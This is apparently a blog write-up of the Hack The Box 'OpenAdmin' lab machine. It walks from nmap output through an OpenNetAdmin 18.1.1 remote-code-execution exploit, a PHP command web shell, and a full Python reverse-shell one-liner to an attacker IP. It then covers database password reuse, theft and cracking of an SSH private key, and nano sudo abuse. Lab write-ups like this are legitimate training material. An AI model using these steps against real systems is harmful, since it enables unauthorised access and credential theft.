Hello everyone , in this post I will be sharing my writeup for HTB Openadmin machine , which is an easy linux box , in which the foothold involved enumerating the web server finding open net admin being used and it showed the version which was vulnerable to remote code execution , after getting a shell it wasn’t stabilized so having the permissions to write in the folder which was being hosted on port 80 we could create a php file which can execute commands as GET parameter so in this we can have a proper shell , after having a proper foothold escalate to the first user was simple as database was running and we could check the password for database user it was valid for first user which it was . After becoming the second user we can see we are in internal group and we can access a folder named internal in /var/www ,seeing the open ports on the machine there was a port which was hosting that folder and here it was just all about white box testing as we know the source code so we can get the output of the file while making a request to that port using curl , for becoming root user it very trivial.
NMAP
nmap -p- -sC -sV --min-rate 5000 IPPORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VG
HiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNK
WaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2
tPAFPpvipRrLE=
| 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
PORT 80 (HTTP)
On the web server we only get apache default web page
I tried to see if it had something in robots.txt but that file didn't existed
So I decide to run gobuster to fuzz for files and directories
Going to music we can see a html template page , there's login link which takes us to OpenNetAdmin page which is an application for managing IP addresses DNS , sub nets and etc also it exposes the version of openetadmin which is 18.1.1
On googling for any exploits which are there for version 18.1.1 we can see a github repo having the PoC of remote code execution
https://github.com/amriunix/ona-rce
We can check through poc if the target is vulnerable or not
But when running the exploit it breaks
So I went to exploit-db and try that exploit
And this one worked perfectly
I tried getting a reverse shell again so that I can stabilize it but it wasn’t working
I made a simple php file having a GET parameter named cmd which will be executed through system function which is used to execute shell commands and outputs the result , then I hosted this file using python3 and downloaded it on target machine using wget
Using python3 reverse shell I was able to get a proper shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.84",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'Here I have just tried to stabilize the shell so we can have the ability to clear terminal screen also use bash history by using up and arrow down keys
We can go into /home directory to see how many users are there
There are 2 users but we can’t navigate into to folders as www-data doesn't have permissions to view them. We can look for any cronjobs running through cat /etc/crontab
Nothing there, next we can look for open ports
Here we can see port 3306 which is for database , we can try to view the database password and see if it works on either one of the users
In /opt/ona/www/local/config we can see a database settings file
Let’s try this password on jimmy
Perfect this worked !
But doing sudo -l failed the user was not allowed to use sudo I guess , so this user is in internal group maybe there's some folder we can look into
So looking into `index.php` we can see it’s a login page which requires username and password and there’s a condition if we provide the username as `jimmy` or provide the correct password which we could just decrypt the sha512 hash , on decrypting it is `Revealed`
We can also see a php file main.php which is executing a shell command to read id_rsa key of joanna , if we try to run the php file we will get permission denied error as it's going to be executed as jimmy
If we look at the running ports on the machine we can see a port 52846
Using curl we can make a request on that port and it seems this is the same page that we saw in internal directory so this directory is being hosted on port 52846 this means we can navigate to main.php file
I saved the request to main.php in a text file and transferred that file on my machine
On using the private key , it asks for a passphrase
Using ssh2john we can get the hash of id_rsa and crack it so we can get the passphrase
Now we have escalated to the second user , on running sudo -l we can see have permissions to run nano on /opt/priv
We can check the how to abuse nano from GTFOBINS
https://gtfobins.github.io/gtfobins/nano/
